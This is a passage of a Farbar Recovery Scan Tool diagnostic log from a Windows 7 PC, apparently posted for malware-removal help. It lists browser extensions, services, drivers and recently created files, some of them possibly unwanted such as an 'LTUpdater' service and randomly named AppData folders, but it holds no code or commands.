CHR Extension: (Norton Identity Safe) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-10-17]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-10-17]

CHR Extension: (Gmail) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-17]

CHR Extension: (Chrome Media Router) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-17]

CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\Exts\Chrome.crx [2016-09-30]

CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\Exts\Chrome.crx [2016-09-30]

CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 FastbootService; C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe [160048 2012-11-21] (Lenovo)

R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [129856 2012-07-19] (Intel Corporation)

S3 intelsba; C:\Program Files\Intel\Intel® Small Business Advantage\Service\Intel.SmallBusinessAdvantage.WindowsService.exe [48832 2013-04-10] (Intel Corporation)

R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-07-19] (Intel Corporation)

R2 LENOVO.TVTVCAM; C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe [187688 2013-06-14] (Lenovo Group Limited)

R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [136288 2012-08-10] (Lenovo Group Limited)

S3 LSCWinService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCWinService.exe [30184 2013-08-08] ()

S2 LTUpdater; C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe [476072 2015-02-25] (System Alerts LLC)

R2 MSSQL$UPSWSDBSERVER; c:\UPS\WSTD\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)

S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [272688 2012-08-23] ()

R2 NitroDriverReadSpool8; C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe [230408 2013-03-12] (Nitro PDF Software)

R2 NSBU; C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\NSBU.exe [289080 2016-09-23] (Symantec Corporation)

R2 PMBDeviceInfoProvider; C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe [506960 2015-12-26] (Sony Corporation)

R2 ScsiAccess; C:\Windows\SysWOW64\ScsiAccess.EXE [181312 2003-02-04] () [File not signed]

S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [22376 2013-02-04] ()

S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3342640 2012-08-23] (Intel® Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security with Backup\NortonData\22.5.5.15\Definitions\BASHDefs\20161005.001\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)

R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [111104 2012-05-21] (Motorola Solutions, Inc.)

R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [849408 2012-06-09] (Motorola Solutions, Inc.)

R1 ccSet_NSBU; C:\Windows\system32\drivers\NSBUx64\1608000.032\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)

R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)

R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)

S3 Fastboot; C:\Windows\System32\DRIVERS\Fastboot.sys [71472 2012-11-21] (Windows ® Win 7 DDK provider)

R1 IDSVia64; C:\Program Files (x86)\Norton Security with Backup\NortonData\22.5.5.15\Definitions\IPSDefs\20161014.003\IDSvia64.sys [1012440 2016-09-23] (Symantec Corporation)

R3 RSP2STOR; C:\Windows\System32\DRIVERS\RtsP2Stor.sys [288840 2013-05-16] (Realtek Semiconductor Corp.)

S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [12400 2016-06-02] (Macrovision Europe Ltd) [File not signed]

R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-04-04] (Synaptics Incorporated)

R1 SRTSP; C:\Windows\System32\Drivers\NSBUx64\1608000.032\SRTSP64.SYS [784624 2016-09-23] (Symantec Corporation)

R1 SRTSPX; C:\Windows\system32\drivers\NSBUx64\1608000.032\SRTSPX64.SYS [49400 2016-09-23] (Symantec Corporation)

R0 SymEFASI; C:\Windows\System32\drivers\NSBUx64\1608000.032\SYMEFASI64.SYS [1628888 2016-09-23] (Symantec Corporation)

R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-17] (Symantec Corporation)

R1 SymIRON; C:\Windows\system32\drivers\NSBUx64\1608000.032\Ironx64.SYS [289520 2016-09-23] (Symantec Corporation)

R1 SymNetS; C:\Windows\System32\Drivers\NSBUx64\1608000.032\SYMNETS.SYS [567512 2016-09-23] (Symantec Corporation)

R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [40248 2011-05-29] (Lenovo Information Product(ShenZhen China) Inc.)

S3 tvtvcamd; C:\Windows\System32\DRIVERS\tvtvcamd.sys [27432 2011-12-08] (ThinkVantage Communications Utility)

R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [47072 2012-11-29] (Windows ® Win 7 DDK provider)

S3 vm331avs; C:\Windows\System32\Drivers\vm331avs.sys [1045248 2013-03-01] (Vimicro Corporation) [File not signed]

R3 XHCIPort; C:\Windows\System32\DRIVERS\XHCIPort.sys [188896 2012-11-29] (Windows ® Win 7 DDK provider)

S3 NAVENG; \??\C:\Program Files (x86)\Norton Security with Backup\NortonData\22.5.5.15\Definitions\SDSDefs\20161004.006\ENG64.SYS [X]

S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security with Backup\NortonData\22.5.5.15\Definitions\SDSDefs\20161004.006\EX64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 15:23 - 2016-10-17 15:25 - 00033098 _____ C:\Users\Dwight\Downloads\FRST.txt

2016-10-17 15:14 - 2016-10-17 15:23 - 00000000 ____D C:\FRST

2016-10-17 15:13 - 2016-10-17 15:13 - 02406912 _____ (Farbar) C:\Users\Dwight\Downloads\FRST64.exe

2016-10-17 12:42 - 2016-10-17 12:42 - 00000134 _____ C:\Users\Dwight\Desktop\Internet Explorer Troubleshooting.url

2016-10-17 11:33 - 2016-10-17 11:33 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security with Backup

2016-10-17 11:27 - 2016-10-17 11:27 - 00003240 _____ C:\Windows\System32\Tasks\Norton WSC Integration

2016-10-17 11:24 - 2016-10-17 11:24 - 00007605 _____ C:\Users\Dwight\AppData\Local\Resmon.ResmonCfg

2016-10-17 11:13 - 2016-10-17 11:14 - 55915216 _____ (Microsoft Corporation) C:\Users\Dwight\Downloads\IE11-Windows6.1-x64-en-us.exe

2016-10-17 10:50 - 2016-10-17 10:50 - 00002278 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-10-17 10:50 - 2016-10-17 10:50 - 00002266 _____ C:\Users\Public\Desktop\Google Chrome.lnk

2016-10-17 10:48 - 2016-10-17 10:49 - 01065376 _____ (Google Inc.) C:\Users\Dwight\Downloads\ChromeSetup.exe

2016-10-17 10:37 - 2016-10-17 10:39 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

2016-10-17 10:37 - 2016-10-17 10:37 - 00001170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

2016-10-17 10:37 - 2016-10-17 10:37 - 00001158 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk

2016-10-16 17:47 - 2016-10-16 17:47 - 00000000 ____D C:\Users\Dwight\AppData\Roaming\Google

2016-10-16 17:46 - 2016-10-17 14:57 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-10-16 17:46 - 2016-10-17 13:30 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-10-16 17:46 - 2016-10-17 10:59 - 00000000 ____D C:\Users\Dwight\AppData\Local\Google

2016-10-16 17:46 - 2016-10-17 10:49 - 00000000 ____D C:\Program Files (x86)\Google

2016-10-16 17:46 - 2016-10-16 17:52 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2016-10-16 17:46 - 2016-10-16 17:52 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2016-10-16 17:46 - 2016-10-16 17:46 - 00000000 ____D C:\ProgramData\Google

2016-10-16 17:46 - 2016-10-16 17:46 - 00000000 ____D C:\Program Files\Google

2016-10-16 17:45 - 2016-10-16 17:45 - 08244656 _____ (Piriform Ltd) C:\Users\Dwight\Downloads\ccsetup522.exe

2016-10-16 17:41 - 2016-10-16 17:41 - 00086118 _____ C:\Users\Dwight\Documents\cc_20161016_174116.reg

2016-10-16 17:23 - 2016-10-16 17:23 - 00003164 _____ C:\Windows\System32\Tasks\{5B01BB45-7AAE-4C68-9F67-48868AF66FE3}

2016-10-16 17:22 - 2016-10-16 17:22 - 01857488 _____ C:\Users\Dwight\Downloads\install_kodak_easyshare.exe

2016-10-13 10:53 - 2016-10-16 12:24 - 00000000 ____D C:\Users\Dwight\AppData\Local\20e01

2016-10-13 10:53 - 2016-10-13 10:53 - 00000000 ____D C:\Users\Dwight\AppData\Roaming\e8f3f

2016-10-13 10:52 - 2016-10-13 10:52 - 00006389 _____ C:\Users\Dwight\Downloads\firefox-patch(1).js

2016-10-12 10:01 - 2016-09-30 11:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe

2016-10-12 10:01 - 2016-09-30 11:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe

2016-10-12 10:01 - 2016-09-30 11:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe

2016-10-12 10:01 - 2016-09-15 11:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll

2016-10-12 10:01 - 2016-09-15 11:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll

2016-10-12 10:01 - 2016-09-15 11:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll

2016-10-12 10:01 - 2016-09-15 11:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll

2016-10-12 10:01 - 2016-09-12 17:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys

2016-10-12 10:01 - 2016-09-12 17:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys

2016-10-12 10:01 - 2016-09-12 17:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll

2016-10-12 10:01 - 2016-09-12 17:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll

2016-10-12 10:01 - 2016-09-12 16:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2016-10-12 10:01 - 2016-09-12 16:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe

2016-10-12 10:01 - 2016-09-12 16:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2016-10-12 10:01 - 2016-09-12 16:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys

2016-10-12 10:01 - 2016-09-12 16:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys

2016-10-12 10:01 - 2016-09-12 16:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys

2016-10-12 10:01 - 2016-09-12 16:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe

2016-10-12 10:01 - 2016-09-12 16:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe

2016-10-12 10:01 - 2016-09-12 16:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll

2016-10-12 10:01 - 2016-09-12 15:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll

2016-10-12 10:01 - 2016-09-12 14:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll

2016-10-12 10:01 - 2016-09-12 14:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll

2016-10-12 10:01 - 2016-09-10 12:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll

2016-10-12 10:01 - 2016-09-10 11:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll

2016-10-12 10:01 - 2016-09-09 14:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi

2016-10-12 10:01 - 2016-09-09 14:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi

2016-10-12 10:01 - 2016-09-09 14:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 14:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll

2016-10-12 10:01 - 2016-09-09 14:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll

2016-10-12 10:01 - 2016-09-09 14:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll

2016-10-12 10:01 - 2016-09-09 14:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll

2016-10-12 10:01 - 2016-09-09 14:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll

